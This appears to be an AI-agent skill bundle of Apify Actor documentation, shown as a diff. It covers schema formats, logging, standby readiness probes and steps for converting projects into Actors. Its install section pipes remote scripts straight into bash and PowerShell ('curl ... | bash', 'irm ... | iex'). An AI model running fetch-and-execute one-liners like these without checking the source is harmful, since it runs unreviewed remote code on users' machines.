storage/key_value_stores/default/INPUT.json
```

This file should contain the input parameters defined in your `.actor/input_schema.json`. The actor will read this input when running locally, mirroring how it receives input on the Apify platform.

**IMPORTANT - Local storage is NOT synced to the Apify Console:**

- Running `apify run` stores all data (datasets, key-value stores, request queues) **only on your local filesystem** in the `storage/` directory.
- This data is **never** automatically uploaded or pushed to the Apify platform. It exists only on your machine.
- To verify results on the Apify Console, you must deploy the Actor with `apify push` and then run it on the platform.
- Do **not** rely on checking the Apify Console to verify results from local runs — instead, inspect the local `storage/` directory or check the Actor's log output.

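Preparing that input file can be sketched as below. A temporary directory stands in for the project root, and the field names mirror the example input schema rather than any required set:

```python
import json
import tempfile
from pathlib import Path

# A temp dir stands in for the project root in this sketch.
root = Path(tempfile.mkdtemp())
input_path = root / "storage" / "key_value_stores" / "default" / "INPUT.json"
input_path.parent.mkdir(parents=True, exist_ok=True)

# Write the input the Actor would receive, matching .actor/input_schema.json fields.
input_path.write_text(json.dumps({
    "startUrls": [{"url": "https://example.com"}],
    "maxRequestsPerCrawl": 10,
}))

# Locally, the SDK reads this file; on the platform the same data comes from the API.
actor_input = json.loads(input_path.read_text())
print(actor_input["maxRequestsPerCrawl"])
```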
## Standby Mode

See [references/standby-mode.md](references/standby-mode.md) for complete standby mode documentation, including readiness probe implementation for JavaScript/TypeScript and Python.

## Project Structure

```
.actor/
├── actor.json            # Actor config: name, version, env vars, runtime
├── input_schema.json     # Input validation & Console form definition
└── output_schema.json    # Output storage and display templates
src/
└── main.js/ts/py         # Actor entry point
storage/                  # Local-only storage (NOT synced to Apify Console)
├── datasets/             # Output items (JSON objects)
├── key_value_stores/     # Files, config, INPUT
└── request_queues/       # Pending crawl requests
Dockerfile                # Container image definition
```

## Actor Configuration

See [references/actor-json.md](references/actor-json.md) for complete actor.json structure and configuration options.

## Input Schema

See [references/input-schema.md](references/input-schema.md) for input schema structure and examples.

## Output Schema

See [references/output-schema.md](references/output-schema.md) for output schema structure, examples, and template variables.

## Dataset Schema

See [references/dataset-schema.md](references/dataset-schema.md) for dataset schema structure, configuration, and display properties.

## Key-Value Store Schema

See [references/key-value-store-schema.md](references/key-value-store-schema.md) for key-value store schema structure, collections, and configuration.

## Apify MCP Tools

If an MCP server is configured, use these tools for documentation:

- `search-apify-docs` - Search documentation
- `fetch-apify-docs` - Get full doc pages

Otherwise, connect to the MCP server at `https://mcp.apify.com/?tools=docs`.

## Resources

- [docs.apify.com/llms.txt](https://docs.apify.com/llms.txt) - Apify quick reference documentation
- [docs.apify.com/llms-full.txt](https://docs.apify.com/llms-full.txt) - Apify complete documentation
- [crawlee.dev/llms.txt](https://crawlee.dev/llms.txt) - Crawlee quick reference documentation
- [crawlee.dev/llms-full.txt](https://crawlee.dev/llms-full.txt) - Crawlee complete documentation
- [whitepaper.actor](https://raw.githubusercontent.com/apify/actor-whitepaper/refs/heads/master/README.md) - Complete Actor specification

@@ -0,0 +1,66 @@

# Actor Configuration (actor.json)

The `.actor/actor.json` file contains the Actor's configuration, including metadata, schema references, and platform settings.

## Structure

```json
{
    "actorSpecification": 1,
    "name": "project-name",
    "title": "Project Title",
    "description": "Actor description",
    "version": "0.0",
    "meta": {
        "templateId": "template-id",
        "generatedBy": "<FILL-IN-TOOL-AND-MODEL>"
    },
    "input": "./input_schema.json",
    "output": "./output_schema.json",
    "storages": {
        "dataset": "./dataset_schema.json"
    },
    "dockerfile": "../Dockerfile"
}
```

## Example

```json
{
    "actorSpecification": 1,
    "name": "project-cheerio-crawler-javascript",
    "title": "Project Cheerio Crawler JavaScript",
    "description": "Crawlee and Cheerio project in JavaScript.",
    "version": "0.0",
    "meta": {
        "templateId": "js-crawlee-cheerio",
        "generatedBy": "Claude Code with Claude Sonnet 4.5"
    },
    "input": "./input_schema.json",
    "output": "./output_schema.json",
    "storages": {
        "dataset": "./dataset_schema.json"
    },
    "dockerfile": "../Dockerfile"
}
```

## Properties

- `actorSpecification` (integer, required) - Version of the actor specification (currently 1)
- `name` (string, required) - Actor identifier (lowercase, hyphens allowed)
- `title` (string, required) - Human-readable title displayed in UI
- `description` (string, optional) - Actor description for marketplace
- `version` (string, required) - Semantic version number
- `meta` (object, optional) - Metadata about actor generation
  - `templateId` (string) - ID of template used to create the actor
  - `generatedBy` (string) - Tool and model name that generated/modified the actor (e.g., "Claude Code with Claude Sonnet 4.5")
- `input` (string, optional) - Path to input schema file
- `output` (string, optional) - Path to output schema file
- `storages` (object, optional) - Storage schema references
  - `dataset` (string) - Path to dataset schema file
  - `keyValueStore` (string) - Path to key-value store schema file
- `dockerfile` (string, optional) - Path to Dockerfile

**Important:** Always fill in the `generatedBy` property with the tool and model you're currently using (e.g., "Claude Code with Claude Sonnet 4.5") to help Apify improve documentation.

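A quick sanity check for the required properties above can be sketched with a hypothetical helper (this is an illustration, not part of the Apify CLI, which performs its own validation):

```python
import json

# Required top-level properties per the list above.
REQUIRED = ["actorSpecification", "name", "title", "version"]

def check_actor_json(text):
    """Return the required properties missing from an actor.json document."""
    config = json.loads(text)
    return [key for key in REQUIRED if key not in config]

sample = json.dumps({
    "actorSpecification": 1,
    "name": "my-actor",
    "title": "My Actor",
    "version": "0.1",
})
missing = check_actor_json(sample)
print(missing)  # empty list: all required properties present
```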
@@ -0,0 +1,209 @@

# Dataset Schema Reference

The dataset schema defines how your Actor's output data is structured, transformed, and displayed in the Output tab in the Apify Console.

## Examples

### JavaScript and TypeScript

Consider an example Actor that calls `Actor.pushData()` to store data into the dataset:

```javascript
import { Actor } from 'apify';

// Initialize the JavaScript SDK
await Actor.init();

/**
 * Actor code
 */
await Actor.pushData({
    numericField: 10,
    pictureUrl: 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png',
    linkUrl: 'https://google.com',
    textField: 'Google',
    booleanField: true,
    dateField: new Date(),
    arrayField: ['#hello', '#world'],
    objectField: {},
});

// Exit successfully
await Actor.exit();
```

### Python

Consider an example Actor that calls `Actor.push_data()` to store data into the dataset:

```python
# Dataset push example (Python)
import asyncio
from datetime import datetime
from apify import Actor


async def main():
    await Actor.init()

    # Actor code
    await Actor.push_data({
        'numericField': 10,
        'pictureUrl': 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png',
        'linkUrl': 'https://google.com',
        'textField': 'Google',
        'booleanField': True,
        'dateField': datetime.now().isoformat(),
        'arrayField': ['#hello', '#world'],
        'objectField': {},
    })

    # Exit successfully
    await Actor.exit()


if __name__ == '__main__':
    asyncio.run(main())
```

## Configuration

To set up the Actor's Output tab UI, reference a dataset schema file in `.actor/actor.json`:

```json
{
    "actorSpecification": 1,
    "name": "book-library-scraper",
    "title": "Book Library Scraper",
    "version": "1.0.0",
    "storages": {
        "dataset": "./dataset_schema.json"
    }
}
```

Then create the dataset schema in `.actor/dataset_schema.json`:

```json
{
    "actorSpecification": 1,
    "fields": {},
    "views": {
        "overview": {
            "title": "Overview",
            "transformation": {
                "fields": [
                    "pictureUrl",
                    "linkUrl",
                    "textField",
                    "booleanField",
                    "arrayField",
                    "objectField",
                    "dateField",
                    "numericField"
                ]
            },
            "display": {
                "component": "table",
                "properties": {
                    "pictureUrl": { "label": "Image", "format": "image" },
                    "linkUrl": { "label": "Link", "format": "link" },
                    "textField": { "label": "Text", "format": "text" },
                    "booleanField": { "label": "Boolean", "format": "boolean" },
                    "arrayField": { "label": "Array", "format": "array" },
                    "objectField": { "label": "Object", "format": "object" },
                    "dateField": { "label": "Date", "format": "date" },
                    "numericField": { "label": "Number", "format": "number" }
                }
            }
        }
    }
}
```

## Structure

```json
{
    "actorSpecification": 1,
    "fields": {},
    "views": {
        "<VIEW_NAME>": {
            "title": "string (required)",
            "description": "string (optional)",
            "transformation": {
                "fields": ["string (required)"],
                "unwind": ["string (optional)"],
                "flatten": ["string (optional)"],
                "omit": ["string (optional)"],
                "limit": "integer (optional)",
                "desc": "boolean (optional)"
            },
            "display": {
                "component": "table (required)",
                "properties": {
                    "<FIELD_NAME>": {
                        "label": "string (optional)",
                        "format": "text|number|date|link|boolean|image|array|object (optional)"
                    }
                }
            }
        }
    }
}
```

## Properties

### Dataset Schema Properties

- `actorSpecification` (integer, required) - Version of the dataset schema structure document (currently only version 1)
- `fields` (JSON Schema object, required) - Schema of one dataset object (use JSON Schema draft 2020-12 or compatible)
- `views` (DatasetView object, required) - Object with API and UI views description

### DatasetView Properties

- `title` (string, required) - Visible in UI Output tab and API
- `description` (string, optional) - Only available in API response
- `transformation` (ViewTransformation object, required) - Data transformation applied when loading from the Dataset API
- `display` (ViewDisplay object, required) - Output tab UI visualization definition

### ViewTransformation Properties

- `fields` (string[], required) - Fields to present in output (order matches column order)
- `unwind` (string[], optional) - Deconstructs nested children into parent object
- `flatten` (string[], optional) - Transforms nested object into flat structure
- `omit` (string[], optional) - Removes specified fields from output
- `limit` (integer, optional) - Maximum number of results (default: all)
- `desc` (boolean, optional) - Sort order (true = newest first)

### ViewDisplay Properties

- `component` (string, required) - Only `table` is available
- `properties` (Object, optional) - Keys matching `transformation.fields` with ViewDisplayProperty values

### ViewDisplayProperty Properties

- `label` (string, optional) - Table column header
- `format` (string, optional) - One of: `text`, `number`, `date`, `link`, `boolean`, `image`, `array`, `object`

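The transformation properties above are applied server-side by the Dataset API; the sketch below only mimics `fields`, `omit`, `limit`, and `desc` locally to make their effect concrete. The helper name and the order in which it applies the steps are illustrative assumptions, not platform behavior.

```python
def apply_view_transformation(items, fields, omit=None, limit=None, desc=False):
    """Locally mimic a view transformation: optionally reverse order,
    cap the number of items, then project the selected fields."""
    omit = set(omit or [])
    if desc:
        items = list(reversed(items))
    if limit is not None:
        items = items[:limit]
    return [
        {key: item.get(key) for key in fields if key not in omit}
        for item in items
    ]

rows = [
    {"textField": "a", "numericField": 1, "secret": "x"},
    {"textField": "b", "numericField": 2, "secret": "y"},
    {"textField": "c", "numericField": 3, "secret": "z"},
]
view = apply_view_transformation(
    rows, fields=["textField", "numericField"], omit=["secret"], limit=2, desc=True
)
print(view)  # last two rows, newest first, secret field dropped
```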
@@ -0,0 +1,66 @@

# Input Schema Reference

The input schema defines the input parameters for an Actor. It's a JSON object comprising various field types supported by the Apify platform.

## Structure

```json
{
    "title": "<INPUT-SCHEMA-TITLE>",
    "type": "object",
    "schemaVersion": 1,
    "properties": {
        /* define input fields here */
    },
    "required": []
}
```

## Example

```json
{
    "title": "E-commerce Product Scraper Input",
    "type": "object",
    "schemaVersion": 1,
    "properties": {
        "startUrls": {
            "title": "Start URLs",
            "type": "array",
            "description": "URLs to start scraping from (category pages or product pages)",
            "editor": "requestListSources",
            "default": [{ "url": "https://example.com/category" }],
            "prefill": [{ "url": "https://example.com/category" }]
        },
        "followVariants": {
            "title": "Follow Product Variants",
            "type": "boolean",
            "description": "Whether to scrape product variants (different colors, sizes)",
            "default": true
        },
        "maxRequestsPerCrawl": {
            "title": "Max Requests per Crawl",
            "type": "integer",
            "description": "Maximum number of pages to scrape (0 = unlimited)",
            "default": 1000,
            "minimum": 0
        },
        "proxyConfiguration": {
            "title": "Proxy Configuration",
            "type": "object",
            "description": "Proxy settings for anti-bot protection",
            "editor": "proxy",
            "default": { "useApifyProxy": false }
        },
        "locale": {
            "title": "Locale",
            "type": "string",
            "description": "Language/country code for localized content",
            "default": "cs",
            "enum": ["cs", "en", "de", "sk"],
            "enumTitles": ["Czech", "English", "German", "Slovak"]
        }
    },
    "required": ["startUrls"]
}
```

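To make the interaction of `default` and `required` in the example concrete, here is a hedged sketch: a hypothetical `resolve_input` helper that fills defaults and rejects missing required fields. The platform performs full schema validation itself; this only illustrates the semantics.

```python
import json

# A trimmed version of the example schema above.
schema = json.loads("""{
    "schemaVersion": 1,
    "properties": {
        "followVariants": {"type": "boolean", "default": true},
        "maxRequestsPerCrawl": {"type": "integer", "default": 1000},
        "startUrls": {"type": "array"}
    },
    "required": ["startUrls"]
}""")

def resolve_input(schema, user_input):
    """Fill in defaults for omitted fields and fail on missing required ones."""
    resolved = {}
    for name, spec in schema["properties"].items():
        if name in user_input:
            resolved[name] = user_input[name]
        elif "default" in spec:
            resolved[name] = spec["default"]
    missing = [name for name in schema.get("required", []) if name not in resolved]
    if missing:
        raise ValueError(f"Missing required input fields: {missing}")
    return resolved

resolved = resolve_input(schema, {"startUrls": [{"url": "https://example.com"}]})
print(resolved["maxRequestsPerCrawl"])  # default applied for the omitted field
```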
@@ -0,0 +1,129 @@

# Key-Value Store Schema Reference

The key-value store schema organizes keys into logical groups called collections for easier data management.

## Examples

### JavaScript and TypeScript

Consider an example Actor that calls `Actor.setValue()` to save records into the key-value store:

```javascript
import { Actor } from 'apify';

// Initialize the JavaScript SDK
await Actor.init();

/**
 * Actor code
 */
await Actor.setValue('document-1', 'my text data', { contentType: 'text/plain' });

const imageID = '123'; // example placeholder
const imageBuffer = Buffer.from('...'); // buffer with image data
await Actor.setValue(`image-${imageID}`, imageBuffer, { contentType: 'image/jpeg' });

// Exit successfully
await Actor.exit();
```

### Python

Consider an example Actor that calls `Actor.set_value()` to save records into the key-value store:

```python
# Key-Value Store set example (Python)
import asyncio
from apify import Actor


async def main():
    await Actor.init()

    # Actor code
    await Actor.set_value('document-1', 'my text data', content_type='text/plain')

    image_id = '123'  # example placeholder
    image_buffer = b'...'  # bytes buffer with image data
    await Actor.set_value(f'image-{image_id}', image_buffer, content_type='image/jpeg')

    # Exit successfully
    await Actor.exit()


if __name__ == '__main__':
    asyncio.run(main())
```

## Configuration

To configure the key-value store schema, reference a schema file in `.actor/actor.json`:

```json
{
    "actorSpecification": 1,
    "name": "data-collector",
    "title": "Data Collector",
    "version": "1.0.0",
    "storages": {
        "keyValueStore": "./key_value_store_schema.json"
    }
}
```

Then create the key-value store schema in `.actor/key_value_store_schema.json`:

```json
{
    "actorKeyValueStoreSchemaVersion": 1,
    "title": "Key-Value Store Schema",
    "collections": {
        "documents": {
            "title": "Documents",
            "description": "Text documents stored by the Actor",
            "keyPrefix": "document-"
        },
        "images": {
            "title": "Images",
            "description": "Images stored by the Actor",
            "keyPrefix": "image-",
            "contentTypes": ["image/jpeg"]
        }
    }
}
```

## Structure

```json
{
    "actorKeyValueStoreSchemaVersion": 1,
    "title": "string (required)",
    "description": "string (optional)",
    "collections": {
        "<COLLECTION_NAME>": {
            "title": "string (required)",
            "description": "string (optional)",
            "key": "string (conditional - use key OR keyPrefix)",
            "keyPrefix": "string (conditional - use key OR keyPrefix)",
            "contentTypes": ["string (optional)"],
            "jsonSchema": "object (optional)"
        }
    }
}
```

## Properties

### Key-Value Store Schema Properties

- `actorKeyValueStoreSchemaVersion` (integer, required) - Version of the key-value store schema structure document (currently only version 1)
- `title` (string, required) - Title of the schema
- `description` (string, optional) - Description of the schema
- `collections` (Object, required) - Object where each key is a collection ID and each value is a Collection object

### Collection Properties

- `title` (string, required) - Collection title shown in UI tabs
- `description` (string, optional) - Description appearing in UI tooltips
- `key` (string, conditional) - Single specific key for this collection
- `keyPrefix` (string, conditional) - Prefix for keys included in this collection
- `contentTypes` (string[], optional) - Allowed content types for validation
- `jsonSchema` (object, optional) - JSON Schema draft 07 format for `application/json` content type validation

Either `key` or `keyPrefix` must be specified for each collection, but not both.

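The key/keyPrefix matching rule above can be sketched as a small local helper — a hypothetical `collection_for_key` function illustrating how a key maps to a collection; the platform does this grouping itself.

```python
def collection_for_key(collections, key):
    """Return the ID of the collection whose `key` or `keyPrefix`
    matches the given record key, or None if nothing matches."""
    for name, spec in collections.items():
        if spec.get("key") == key:
            return name
        prefix = spec.get("keyPrefix")
        if prefix and key.startswith(prefix):
            return name
    return None

collections = {
    "documents": {"keyPrefix": "document-"},
    "images": {"keyPrefix": "image-"},
    "report": {"key": "final-report"},
}
print(collection_for_key(collections, "image-42"))      # matches the images prefix
print(collection_for_key(collections, "final-report"))  # matches the exact key
print(collection_for_key(collections, "misc"))          # no collection
```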
@@ -0,0 +1,50 @@

# Actor Logging Reference

## JavaScript and TypeScript

**ALWAYS use the `apify/log` package for logging** - This package contains critical security logic, including censoring sensitive data (Apify tokens, API keys, credentials) to prevent accidental exposure in logs.

### Available Log Levels in `apify/log`

The Apify log package provides the following methods for logging:

- `log.debug()` - Debug level logs (detailed diagnostic information)
- `log.info()` - Info level logs (general informational messages)
- `log.warning()` - Warning level logs (warning messages for potentially problematic situations)
- `log.warningOnce()` - Warning level logs (same warning message logged only once)
- `log.error()` - Error level logs (error messages for failures)
- `log.exception()` - Exception level logs (for exceptions with stack traces)
- `log.perf()` - Performance level logs (performance metrics and timing information)
- `log.deprecated()` - Deprecation level logs (warnings about deprecated code)
- `log.softFail()` - Soft failure logs (non-critical failures that don't stop execution, e.g., input validation errors, skipped items)
- `log.internal()` - Internal level logs (internal/system messages)

### Best Practices

- Use `log.debug()` for detailed operation-level diagnostics (inside functions)
- Use `log.info()` for general informational messages (API requests, successful operations)
- Use `log.warning()` for potentially problematic situations (validation failures, unexpected states)
- Use `log.error()` for actual errors and failures
- Use `log.exception()` for caught exceptions with stack traces

## Python

**ALWAYS use `Actor.log` for logging** - This logger contains critical security logic, including censoring sensitive data (Apify tokens, API keys, credentials) to prevent accidental exposure in logs.

### Available Log Levels

The Apify Actor logger provides the following methods for logging:

- `Actor.log.debug()` - Debug level logs (detailed diagnostic information)
- `Actor.log.info()` - Info level logs (general informational messages)
- `Actor.log.warning()` - Warning level logs (warning messages for potentially problematic situations)
- `Actor.log.error()` - Error level logs (error messages for failures)
- `Actor.log.exception()` - Exception level logs (for exceptions with stack traces)

### Best Practices

- Use `Actor.log.debug()` for detailed operation-level diagnostics (inside functions)
- Use `Actor.log.info()` for general informational messages (API requests, successful operations)
- Use `Actor.log.warning()` for potentially problematic situations (validation failures, unexpected states)
- Use `Actor.log.error()` for actual errors and failures
- Use `Actor.log.exception()` for caught exceptions with stack traces

@@ -0,0 +1,49 @@

# Output Schema Reference

The Actor output schema builds upon the schemas for the dataset and key-value store. It specifies where an Actor stores its output and defines templates for accessing that output. Apify Console uses these output definitions to display run results.

## Structure

```json
{
    "actorOutputSchemaVersion": 1,
    "title": "<OUTPUT-SCHEMA-TITLE>",
    "properties": {
        /* define your outputs here */
    }
}
```

## Example

```json
{
    "actorOutputSchemaVersion": 1,
    "title": "Output schema of the files scraper",
    "properties": {
        "files": {
            "type": "string",
            "title": "Files",
            "template": "{{links.apiDefaultKeyValueStoreUrl}}/keys"
        },
        "dataset": {
            "type": "string",
            "title": "Dataset",
            "template": "{{links.apiDefaultDatasetUrl}}/items"
        }
    }
}
```

## Output Schema Template Variables

- `links` (object) - Contains quick links to the most commonly used URLs
- `links.publicRunUrl` (string) - Public run URL in format `https://console.apify.com/view/runs/:runId`
- `links.consoleRunUrl` (string) - Console run URL in format `https://console.apify.com/actors/runs/:runId`
- `links.apiRunUrl` (string) - API run URL in format `https://api.apify.com/v2/actor-runs/:runId`
- `links.apiDefaultDatasetUrl` (string) - API URL of the default dataset in format `https://api.apify.com/v2/datasets/:defaultDatasetId`
- `links.apiDefaultKeyValueStoreUrl` (string) - API URL of the default key-value store in format `https://api.apify.com/v2/key-value-stores/:defaultKeyValueStoreId`
- `links.containerRunUrl` (string) - URL of a webserver running inside the run in format `https://<containerId>.runs.apify.net/`
- `run` (object) - Contains information about the run, same as returned from the `GET Run` API endpoint
- `run.defaultDatasetId` (string) - ID of the default dataset
- `run.defaultKeyValueStoreId` (string) - ID of the default key-value store

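The substitution of `{{…}}` placeholders like those in the example above can be sketched with a naive renderer. This is an illustration only — it is not the platform's template engine, and the context values are made up:

```python
import re

def render_template(template, context):
    """Naively substitute {{dotted.path}} placeholders by walking
    nested dicts in `context`."""
    def lookup(match):
        value = context
        for part in match.group(1).split("."):
            value = value[part]
        return str(value)
    return re.sub(r"\{\{([\w.]+)\}\}", lookup, template)

context = {
    "links": {"apiDefaultDatasetUrl": "https://api.apify.com/v2/datasets/abc123"},
}
url = render_template("{{links.apiDefaultDatasetUrl}}/items", context)
print(url)  # dataset items URL with the placeholder resolved
```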
@@ -0,0 +1,61 @@

# Actor Standby Mode Reference

## JavaScript and TypeScript

- **NEVER disable standby mode (`usesStandbyMode: false`) in `.actor/actor.json` without explicit permission** - Actor Standby keeps the Actor ready in the background, waiting for incoming HTTP requests; the Actor behaves like a real-time web server or standard API server instead of running once to process everything in batch. Always keep `usesStandbyMode: true` unless there is a specific documented reason to disable it
- **ALWAYS implement a readiness probe handler for standby Actors** - Handle the `x-apify-container-server-readiness-probe` header at the GET / endpoint to ensure proper Actor lifecycle management

You can recognize a standby Actor by checking the `usesStandbyMode` property in `.actor/actor.json`. Only implement the readiness probe if this property is set to `true`.

### Readiness Probe Implementation Example

```javascript
import express from 'express';

const app = express();

// Apify standby readiness probe at root path
app.get('/', (req, res) => {
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    if (req.headers['x-apify-container-server-readiness-probe']) {
        res.end('Readiness probe OK\n');
    } else {
        res.end('Actor is ready\n');
    }
});

// Listen on the standby port provided by the platform (8080 as a local fallback)
app.listen(process.env.ACTOR_STANDBY_PORT ?? 8080);
```

Key points:

- Detect the `x-apify-container-server-readiness-probe` header in incoming requests
- Respond with HTTP 200 status code for both readiness probe and normal requests
- This enables proper Actor lifecycle management in standby mode

## Python
|
||||
|
||||
- **NEVER disable standby mode (`usesStandbyMode: false`) in `.actor/actor.json` without explicit permission** - Actor Standby mode solves this problem by letting you have the Actor ready in the background, waiting for the incoming HTTP requests. In a sense, the Actor behaves like a real-time web server or standard API server instead of running the logic once to process everything in batch. Always keep `usesStandbyMode: true` unless there is a specific documented reason to disable it
|
||||
- **ALWAYS implement readiness probe handler for standby Actors** - Handle the `x-apify-container-server-readiness-probe` header at GET / endpoint to ensure proper Actor lifecycle management
|
||||
|
||||
You can recognize a standby Actor by checking the `usesStandbyMode` property in `.actor/actor.json`. Only implement the readiness probe if this property is set to `true`.
|
||||
|
||||
### Readiness Probe Implementation Example
|
||||
|
||||
```python
|
||||
# Apify standby readiness probe
|
||||
from http.server import SimpleHTTPRequestHandler
|
||||
|
||||
class GetHandler(SimpleHTTPRequestHandler):
|
||||
def do_GET(self):
|
||||
# Handle Apify standby readiness probe
|
||||
if 'x-apify-container-server-readiness-probe' in self.headers:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(b'Readiness probe OK')
|
||||
return
|
||||
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(b'Actor is ready')
|
||||
```
|
||||
|
||||
Key points:
|
||||
|
||||
- Detect the `x-apify-container-server-readiness-probe` header in incoming requests
|
||||
- Respond with HTTP 200 status code for both readiness probe and normal requests
|
||||
- This enables proper Actor lifecycle management in standby mode
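
The handler above never starts a server on its own. A minimal, runnable self-check of the probe logic (the `HTTPServer` wiring and ephemeral-port choice are illustrative, not part of the Apify SDK) looks like this:

```python
# Self-check: run the readiness-probe handler on an ephemeral port
# and exercise both request paths.
import threading
import urllib.request
from http.server import HTTPServer, SimpleHTTPRequestHandler

class GetHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        # Handle Apify standby readiness probe
        if 'x-apify-container-server-readiness-probe' in self.headers:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b'Readiness probe OK')
            return
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'Actor is ready')

    def log_message(self, *args):
        pass  # silence per-request logging during the check

server = HTTPServer(('127.0.0.1', 0), GetHandler)
port = server.server_address[1]
threading.Thread(target=server.serve_forever, daemon=True).start()

probe = urllib.request.Request(
    f'http://127.0.0.1:{port}/',
    headers={'x-apify-container-server-readiness-probe': '1'},
)
with urllib.request.urlopen(probe) as resp:
    probe_body = resp.read()
with urllib.request.urlopen(f'http://127.0.0.1:{port}/') as resp:
    normal_body = resp.read()
server.shutdown()
```

Both paths return HTTP 200; only the response body differs, matching the key points above.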

web-app/public/skills/apify-actorization/SKILL.md (new file, 184 lines)

---
name: apify-actorization
description: "Convert existing projects into Apify Actors - serverless cloud programs. Actorize JavaScript/TypeScript (SDK with Actor.init/exit), Python (async context manager), or any language (CLI wrapper). Us..."
---

# Apify Actorization

Actorization converts existing software into reusable serverless applications compatible with the Apify platform. Actors are programs packaged as Docker images that accept well-defined JSON input, perform an action, and optionally produce structured JSON output.

## Quick Start

1. Run `apify init` in the project root
2. Wrap code with the SDK lifecycle (see the language-specific section below)
3. Configure `.actor/input_schema.json`
4. Test with `apify run --input '{"key": "value"}'`
5. Deploy with `apify push`

## When to Use This Skill

- Converting an existing project to run on the Apify platform
- Adding Apify SDK integration to a project
- Wrapping a CLI tool or script as an Actor
- Migrating a Crawlee project to Apify

## Prerequisites

Verify the `apify` CLI is installed:

```bash
apify --help
```

If not installed:

```bash
curl -fsSL https://apify.com/install-cli.sh | bash

# Or (macOS): brew install apify-cli
# Or (Windows): irm https://apify.com/install-cli.ps1 | iex
# Or: npm install -g apify-cli
```

Verify the CLI is logged in:

```bash
apify info  # Should return your username
```

If not logged in, check whether the `APIFY_TOKEN` environment variable is defined. If not, ask the user to generate one at https://console.apify.com/settings/integrations, then:

```bash
apify login -t $APIFY_TOKEN
```

## Actorization Checklist

Copy this checklist to track progress:

- [ ] Step 1: Analyze project (language, entry point, inputs, outputs)
- [ ] Step 2: Run `apify init` to create Actor structure
- [ ] Step 3: Apply language-specific SDK integration
- [ ] Step 4: Configure `.actor/input_schema.json`
- [ ] Step 5: Configure `.actor/output_schema.json` (if applicable)
- [ ] Step 6: Update `.actor/actor.json` metadata
- [ ] Step 7: Test locally with `apify run`
- [ ] Step 8: Deploy with `apify push`

## Step 1: Analyze the Project

Before making changes, understand the project:

1. **Identify the language** - JavaScript/TypeScript, Python, or other
2. **Find the entry point** - The main file that starts execution
3. **Identify inputs** - Command-line arguments, environment variables, config files
4. **Identify outputs** - Files, console output, API responses
5. **Check for state** - Does it need to persist data between runs?
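
The language check in point 1 can be automated with a small heuristic. This sketch is illustrative only (the `guess_language` helper and its marker-file table are hypothetical, not part of the Apify CLI); manifest files are a common first signal:

```python
# Hypothetical helper: guess a project's primary language from
# well-known manifest files found in the project root.
from pathlib import Path

MARKERS = {
    'package.json': 'JavaScript/TypeScript',
    'pyproject.toml': 'Python',
    'requirements.txt': 'Python',
}

def guess_language(project_root):
    root = Path(project_root)
    for marker, language in MARKERS.items():
        if (root / marker).exists():
            return language
    return 'other'  # fall back to the CLI-wrapper path (Step 3)
```

A project with both a `package.json` and a `requirements.txt` needs manual judgment; treat the result as a starting point, not a verdict.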

## Step 2: Initialize Actor Structure

Run in the project root:

```bash
apify init
```

This creates:

- `.actor/actor.json` - Actor configuration and metadata
- `.actor/input_schema.json` - Input definition for the Apify Console
- `Dockerfile` (if not present) - Container image definition

## Step 3: Apply Language-Specific Changes

Choose based on your project's language:

- **JavaScript/TypeScript**: See [js-ts-actorization.md](references/js-ts-actorization.md)
- **Python**: See [python-actorization.md](references/python-actorization.md)
- **Other Languages (CLI-based)**: See [cli-actorization.md](references/cli-actorization.md)

### Quick Reference

| Language | Install | Wrap Code |
|----------|---------|-----------|
| JS/TS | `npm install apify` | `await Actor.init()` ... `await Actor.exit()` |
| Python | `pip install apify` | `async with Actor:` |
| Other | Use CLI in wrapper script | `apify actor:get-input` / `apify actor:push-data` |

## Steps 4-6: Configure Schemas

See [schemas-and-output.md](references/schemas-and-output.md) for detailed configuration of:

- Input schema (`.actor/input_schema.json`)
- Output schema (`.actor/output_schema.json`)
- Actor configuration (`.actor/actor.json`)
- State management (request queues, key-value stores)

Validate schemas against the `@apify/json_schemas` npm package.
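
As a reference point, a minimal `.actor/input_schema.json` might look like the following. The field names (`startUrl`, `maxItems`) are illustrative and match the test command used in Step 7; replace them with your Actor's real inputs and validate the result as described above:

```json
{
    "title": "Input schema",
    "type": "object",
    "schemaVersion": 1,
    "properties": {
        "startUrl": {
            "title": "Start URL",
            "type": "string",
            "description": "URL to start from",
            "editor": "textfield",
            "prefill": "https://example.com"
        },
        "maxItems": {
            "title": "Max items",
            "type": "integer",
            "description": "Maximum number of items to return",
            "default": 10
        }
    },
    "required": ["startUrl"]
}
```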

## Step 7: Test Locally

Run the Actor with inline input (for JS/TS and Python Actors):

```bash
apify run --input '{"startUrl": "https://example.com", "maxItems": 10}'
```

Or use an input file:

```bash
apify run --input-file ./test-input.json
```

**Important:** Always use `apify run`, not `npm start` or `python main.py`. The CLI sets up the proper environment and storage.
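
For the `--input-file` variant above, `./test-input.json` simply holds the same JSON you would pass inline:

```json
{
    "startUrl": "https://example.com",
    "maxItems": 10
}
```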

## Step 8: Deploy

```bash
apify push
```

This uploads and builds your Actor on the Apify platform.

## Monetization (Optional)

After deploying, you can monetize your Actor in the Apify Store. The recommended model is **Pay Per Event (PPE)**:

- Per result/item scraped
- Per page processed
- Per API call made

Configure PPE in the Apify Console under Actor > Monetization. Charge for events in your code with `await Actor.charge('result')`.

Other options: **Rental** (monthly subscription) or **Free** (open source).

## Pre-Deployment Checklist

- [ ] `.actor/actor.json` exists with correct name and description
- [ ] `.actor/actor.json` validates against `@apify/json_schemas` (`actor.schema.json`)
- [ ] `.actor/input_schema.json` defines all required inputs
- [ ] `.actor/input_schema.json` validates against `@apify/json_schemas` (`input.schema.json`)
- [ ] `.actor/output_schema.json` defines output structure (if applicable)
- [ ] `.actor/output_schema.json` validates against `@apify/json_schemas` (`output.schema.json`)
- [ ] `Dockerfile` is present and builds successfully
- [ ] `Actor.init()` / `Actor.exit()` wraps main code (JS/TS)
- [ ] `async with Actor:` wraps main code (Python)
- [ ] Inputs are read via `Actor.getInput()` / `Actor.get_input()`
- [ ] Outputs use `Actor.pushData()` or key-value store
- [ ] `apify run` executes successfully with test input
- [ ] `generatedBy` is set in the `actor.json` meta section
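
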